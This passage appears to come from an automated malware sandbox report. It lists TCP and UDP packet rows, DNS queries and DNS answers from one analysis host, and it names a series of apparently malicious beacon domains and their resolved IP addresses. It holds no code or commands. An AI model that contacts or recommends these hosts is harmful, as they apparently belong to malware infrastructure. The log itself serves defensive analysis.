                                                                                                                              Nov 2, 2024 08:13:57.299622059 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.318231106 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.323803902 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:58.325445890 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.333332062 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.338486910 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.174343109 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.268290043 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.298933983 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.299026012 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.299966097 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.305874109 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:04.399486065 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.404411077 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:04.404587984 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.413924932 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.420345068 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.317828894 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.362082005 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:05.474242926 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.474302053 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:05.930537939 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.944365025 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.949562073 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:06.949645042 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.965349913 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.970376015 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:07.875579119 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:08.037628889 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:08.037679911 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:08.474715948 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.490874052 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.495735884 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.495937109 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.509880066 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.514760017 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514774084 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514797926 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514807940 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514857054 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514875889 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514908075 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514918089 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514926910 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.455612898 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.552131891 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:10.630234003 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.632832050 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:11.018472910 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.051240921 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.056046009 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.056124926 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.065160990 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.070156097 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999943972 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999978065 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999990940 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000019073 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000034094 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000050068 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000062943 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000112057 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.000154972 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.166991949 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.167292118 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.168096066 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.172904968 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:18.743320942 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.748214006 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:18.748307943 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.761945009 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.766710997 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625241041 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625253916 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625514984 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:19.762628078 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.763724089 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:20.268395901 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.287043095 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.291891098 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:21.292387009 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.305398941 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.310300112 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198544025 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198559046 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198623896 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:22.342174053 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.342235088 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:22.816807985 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.837383032 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.842360020 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.842498064 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.857414961 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.862392902 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862407923 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862477064 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862487078 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862497091 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862550974 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862626076 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862637043 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862646103 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:24.717592955 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:24.717608929 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:24.717632055 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:24.717662096 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:24.717698097 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:25.363430023 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:26.432565928 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:27.284060001 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:27.284171104 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:27.291881084 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:27.296777010 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:28.163489103 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:28.163512945 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:28.163661003 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:28.301270008 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:28.301373959 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:28.302973986 CET4938080192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:28.307758093 CET8049380163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:33.390919924 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:33.395823002 CET8049381199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:33.395905018 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:33.409437895 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:33.414351940 CET8049381199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:34.038485050 CET8049381199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:34.038499117 CET8049381199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:34.038508892 CET8049381199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:34.038547039 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:34.038606882 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:34.909071922 CET4938180192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:35.929400921 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:35.934202909 CET8049382199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:35.934422016 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:35.945405960 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:35.950289965 CET8049382199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:36.590734005 CET8049382199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:36.590749025 CET8049382199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:36.590785980 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:36.590938091 CET8049382199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:36.590986013 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:37.455940962 CET4938280192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:38.493868113 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:38.498887062 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.498965979 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:38.516943932 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:38.521827936 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521838903 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521867037 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521876097 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521887064 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521903038 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.521917105 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.522032976 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:38.522042990 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:39.165965080 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:39.165981054 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:39.166079998 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:39.198905945 CET8049383199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:39.198971033 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:40.018461943 CET4938380192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.089890003 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.094819069 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:41.094913006 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.103035927 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.107897043 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:41.739500046 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:41.739518881 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:41.739639044 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.739943981 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:41.740231991 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.749413967 CET4938480192.168.2.4199.59.243.227
                                                                                                                              Nov 2, 2024 08:14:41.754409075 CET8049384199.59.243.227192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:47.373434067 CET4938580192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:47.379359961 CET8049385103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:47.385456085 CET4938580192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:47.393448114 CET4938580192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:47.398344040 CET8049385103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:48.893588066 CET4938580192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:48.898825884 CET8049385103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:48.898875952 CET4938580192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:49.913443089 CET4938680192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:49.918415070 CET8049386103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:49.925434113 CET4938680192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:49.933433056 CET4938680192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:49.938435078 CET8049386103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:51.440454006 CET4938680192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:51.448259115 CET8049386103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:51.448440075 CET4938680192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:52.459781885 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:52.464740992 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.464813948 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:52.480575085 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:52.480614901 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:52.485627890 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485709906 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485721111 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485729933 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485748053 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485761881 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485783100 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485793114 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:52.485856056 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:53.987224102 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:53.992388010 CET8049387103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:53.993597031 CET4938780192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:55.007333040 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:55.012254953 CET8049388103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:55.012330055 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:55.020785093 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:55.025636911 CET8049388103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:56.642805099 CET8049388103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:56.690299988 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:57.697228909 CET8049388103.233.82.58192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:57.697387934 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:57.699837923 CET4938880192.168.2.4103.233.82.58
                                                                                                                              Nov 2, 2024 08:14:57.704710960 CET8049388103.233.82.58192.168.2.4

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 2, 2024 08:11:29.103503942 CET5356639162.159.36.2192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:29.733165026 CET5815353192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:11:29.740588903 CET53581531.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:11:47.500320911 CET5137553192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:11:47.513348103 CET53513751.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:03.255495071 CET6507253192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:12:03.269942045 CET53650721.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:16.662022114 CET5128253192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:12:17.470988989 CET53512821.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:32.631342888 CET5383653192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:12:32.640595913 CET53538361.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:40.693270922 CET5718553192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:12:40.995657921 CET53571851.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:55.293246031 CET6310853192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET53631081.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:08.772340059 CET5432153192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:13:08.887018919 CET53543211.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:22.773283005 CET6041753192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:13:23.283026934 CET53604171.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:37.103589058 CET5726353192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:13:37.127196074 CET53572631.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:50.584480047 CET5323253192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:13:50.649485111 CET53532321.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:04.319205046 CET5915453192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:14:04.394450903 CET53591541.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:18.179887056 CET5616953192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:14:18.740415096 CET53561691.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:33.321403027 CET6462453192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:14:33.388525963 CET53646241.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:46.757042885 CET5782353192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:14:47.368329048 CET53578231.1.1.1192.168.2.4
                                                                                                                              Nov 2, 2024 08:15:03.084661961 CET6016053192.168.2.41.1.1.1
                                                                                                                              Nov 2, 2024 08:15:03.336184978 CET53601601.1.1.1192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 2, 2024 08:11:29.733165026 CET192.168.2.41.1.1.10x34c3Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:11:47.500320911 CET192.168.2.41.1.1.10xad61Standard query (0)www.litsgs.vipA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:03.255495071 CET192.168.2.41.1.1.10x93f1Standard query (0)www.7wkto5nk230724z.clickA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:16.662022114 CET192.168.2.41.1.1.10x986cStandard query (0)www.roopiedutech.onlineA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:32.631342888 CET192.168.2.41.1.1.10x968bStandard query (0)www.abistra.storeA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:40.693270922 CET192.168.2.41.1.1.10xa56cStandard query (0)www.suree.betA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.293246031 CET192.168.2.41.1.1.10x12a3Standard query (0)www.bocadolobopetra.netA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:08.772340059 CET192.168.2.41.1.1.10x119aStandard query (0)www.44kdd.topA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:22.773283005 CET192.168.2.41.1.1.10x8e91Standard query (0)www.dbasky.netA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:37.103589058 CET192.168.2.41.1.1.10xff36Standard query (0)www.zoptra.infoA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:50.584480047 CET192.168.2.41.1.1.10x2a7fStandard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:04.319205046 CET192.168.2.41.1.1.10x4d48Standard query (0)www.redex.funA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:18.179887056 CET192.168.2.41.1.1.10x19ecStandard query (0)www.broork.sbsA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:33.321403027 CET192.168.2.41.1.1.10x54afStandard query (0)www.deepfy.xyzA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:46.757042885 CET192.168.2.41.1.1.10x91b2Standard query (0)www.cmdh1c.xyzA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:15:03.084661961 CET192.168.2.41.1.1.10xd522Standard query (0)www.beautyconcernsusa.netA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 2, 2024 08:11:29.740588903 CET1.1.1.1192.168.2.40x34c3Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:11:47.513348103 CET1.1.1.1192.168.2.40xad61No error (0)www.litsgs.viplitsgs.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:11:47.513348103 CET1.1.1.1192.168.2.40xad61No error (0)litsgs.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:11:47.513348103 CET1.1.1.1192.168.2.40xad61No error (0)litsgs.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:03.269942045 CET1.1.1.1192.168.2.40x93f1No error (0)www.7wkto5nk230724z.click172.67.131.32A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:03.269942045 CET1.1.1.1192.168.2.40x93f1No error (0)www.7wkto5nk230724z.click104.21.3.193A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:17.470988989 CET1.1.1.1192.168.2.40x986cNo error (0)www.roopiedutech.onlineroopiedutech.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:17.470988989 CET1.1.1.1192.168.2.40x986cNo error (0)roopiedutech.online103.191.208.137A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:32.640595913 CET1.1.1.1192.168.2.40x968bName error (3)www.abistra.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:40.995657921 CET1.1.1.1192.168.2.40xa56cNo error (0)www.suree.betsuree.betCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:40.995657921 CET1.1.1.1192.168.2.40xa56cNo error (0)suree.bet3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:40.995657921 CET1.1.1.1192.168.2.40xa56cNo error (0)suree.bet15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)www.bocadolobopetra.netbocadolobopetra.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)bocadolobopetra.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)bocadolobopetra.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:08.887018919 CET1.1.1.1192.168.2.40x119aNo error (0)www.44kdd.top44kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:08.887018919 CET1.1.1.1192.168.2.40x119aNo error (0)44kdd.top38.47.232.160A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:23.283026934 CET1.1.1.1192.168.2.40x8e91No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
